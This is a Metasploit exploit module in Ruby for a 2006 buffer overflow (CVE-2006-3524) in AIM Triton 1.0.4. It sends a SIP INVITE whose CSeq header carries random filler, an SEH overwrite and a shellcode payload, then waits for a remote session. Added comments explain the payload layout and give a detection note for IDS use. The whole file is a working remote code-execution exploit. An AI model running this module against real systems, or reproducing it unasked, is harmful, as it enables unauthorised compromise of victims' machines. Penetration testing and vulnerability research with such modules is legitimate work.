##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::Remote::Seh

  # Module metadata for the AIM Triton 1.0.4 CSeq overflow (CVE-2006-3524).
  #
  # The 'Payload' block limits the generated payload to 400 bytes and
  # excludes NUL, LF, space, TAB and CR -- presumably because any of those
  # would terminate or split the SIP header value the payload rides in.
  # EXITFUNC defaults to 'seh' to match the SEH-based hijack in #exploit.
  #
  # @param info [Hash] module info supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'AIM Triton 1.0.4 CSeq Buffer Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in AOL\'s AIM
          Triton 1.0.4. By sending an overly long CSeq value,
          a remote attacker could overflow a buffer and execute
          arbitrary code on the system with the privileges of
          the affected application.
        },
        'Author' => 'MC',
        'References' => [
          ['CVE', '2006-3524'],
          ['OSVDB', '27122' ],
          ['BID', '18906'],
          ['ATT&CK', Mitre::Attack::Technique::T1059_COMMAND_AND_SCRIPTING_INTERPRETER],
          ['ATT&CK', Mitre::Attack::Technique::T1068_EXPLOITATION_FOR_PRIVILEGE_ESCALATION],
          ['ATT&CK', Mitre::Attack::Technique::T1204_002_MALICIOUS_FILE]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'seh',
        },
        'Payload' => {
          'Space' => 400,
          'BadChars' => "\x00\x0a\x20\x09\x0d",
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          # Single "universal" target: 'Ret' is the address the SEH record
          # built in #exploit points at (noted as living in coolcore45.dll).
          [ 'AIM Triton 1.0.4 Universal', { 'Ret' => 0x4017b3d9 } ], # coolcore45.dll
        ],
        'Privileged' => false,
        'DisclosureDate' => '2006-07-10',
        'DefaultTarget' => 0,
        # Reliability, stability and side effects were never characterised
        # for this module; #exploit never reads a reply, so treat any run
        # as unconfirmed unless the handler receives a session.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # Only the destination port is declared here (default 5061). RHOST is
    # not registered in this module -- presumably provided by the Udp mixin.
    register_options(
      [
        Opt::RPORT(5061)
      ]
    )
  end

  # Builds one SIP INVITE datagram whose CSeq header carries the overflow,
  # sends it over UDP, then starts the payload handler and closes the socket.
  #
  # Layout of the oversized CSeq value (all sizes fixed by the module):
  #   * filler: 792 random alphabetic bytes that avoid payload_badchars
  #   * the SEH record from generate_seh_payload(target.ret) is written over
  #     the filler starting at offset 780
  #
  # The remaining headers (To/Via/From/Call-ID/Contact) are filled with
  # random values and rhost, presumably so the request parses as a
  # plausible INVITE before the CSeq value is handled.
  #
  # Nothing is read back from the socket, so a completed send does not
  # confirm exploitation; success is only visible through the handler.
  #
  # Detection note: a CSeq header normally holds a short sequence number
  # and a method name; an INVITE whose CSeq value is hundreds of
  # alphabetic bytes is the anomaly a SIP-aware IDS or the endpoint's own
  # logging can key on.
  def exploit
    connect_udp

    user = rand_text_english(2, payload_badchars)
    port = rand(65535).to_s
    filler = rand_text_english(792, payload_badchars)
    seh = generate_seh_payload(target.ret)
    # String#[]= with (start, length) replaces from byte 780 onward; when the
    # SEH record is longer than the 12 bytes left in the filler, the string
    # grows to 780 + seh.length bytes rather than being truncated.
    filler[780, seh.length] = seh

    sploit = "INVITE sip:#{user}\@127.0.0.1 SIP/2.0" + "\r\n"
    sploit << "To: <sip:#{rhost}:#{rport}>" + "\r\n"
    sploit << "Via: SIP/2.0/UDP #{rhost}:#{port}" + "\r\n"
    sploit << "From: \"#{user}\"<sip:#{rhost}:#{port}>" + "\r\n"
    sploit << "Call-ID: #{(rand(100) + 100)}#{rhost}" + "\r\n"
    # The overflow lives entirely in this header value.
    sploit << "CSeq: " + filler + "\r\n"
    sploit << "Max-Forwards: 20" + "\r\n"
    # Blank line after Contact terminates the SIP headers.
    sploit << "Contact: <sip:127.0.0.1:#{port}>" + "\r\n\r\n"

    print_status("Trying target #{target.name}...")

    # Single datagram, fire-and-forget: no response is read or checked.
    udp_sock.put(sploit)

    handler
    disconnect_udp
  end
end